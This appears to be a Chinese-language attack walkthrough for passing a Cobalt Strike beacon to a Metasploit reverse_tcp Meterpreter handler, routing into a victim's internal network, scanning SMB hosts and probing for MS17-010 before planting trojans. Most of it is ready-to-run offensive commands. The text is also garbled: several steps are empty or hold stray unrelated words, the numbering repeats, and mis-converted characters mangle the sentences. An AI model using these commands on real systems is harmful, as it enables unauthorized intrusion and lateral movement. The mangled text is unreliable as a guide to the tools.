第一步html
第二步python
選擇要派生的beacon,右鍵-->增長會話,選擇剛剛配置的foreign監聽器linux
第三部 msfsql
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
第四步添加路由shell
若是在meterpreter中數據庫
run get_local_subnets 查看目標內網路由
run autoroute -s 100.0.0.0/8 #(根據目標內網網絡而定) 添加路由
run autoroute –p 通常來講,在meterpreter中設置路由即可以達到通往其內網的目的。然而有些時候仍是會失敗,這時咱們能夠background返回msf>,查看下外面的路由狀況。
若是沒有路由規則 那麼能夠在msf中windows
msf>route add 10.0.0.0 255.0.0.0 1
說明:1表示session 1,攻擊機若是要去訪問10.0.0.0/8網段的資源,其下一跳是session1,至於什麼是下一條這裏很少說了,反正就是目前攻擊機能夠訪問內網資源了。
而後網絡
鏈接postgresql數據庫,不鏈接的話掃描的信息的信息沒法入庫。鏈接上後可經過db_status查看狀態。
Kali linux:
首先啓動數據庫:service postgresql start
啓動msfsploit服務:service metasploit start
啓動msfconsole:msfconsole
使用db_status確認數據庫是否正確鏈接
若是默認沒有連接的話能夠先本身裝一個postgresql數據庫,而後新建一個名爲msf的庫,在msf中執行命令鏈接:db_connect postgres:123456@127.0.0.1:5433/msfsession
第三步:運行smb模塊探測主機445端口開放狀況。tcp
use auxiliary/scanner/smb/smb_version set rhosts 192.168.236.129/24 set threads 16 run
掃描完成後,掃描的信息會自動存入數據庫,可經過hosts命令查看
第四步:使用smb_ms17_010模塊探測MS17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010 show options set threads 16 services -r tcp -p 445 -R run
而後就是一系列的上馬這些操做了 能夠ipc也能夠msf的upload
文獻參考
https://www.cnblogs.com/backlion/p/9484949.html msf命令操做
https://www.4hou.com/tools/4765.html
https://bbs.ichunqiu.com/thread-53044-1-1.html cs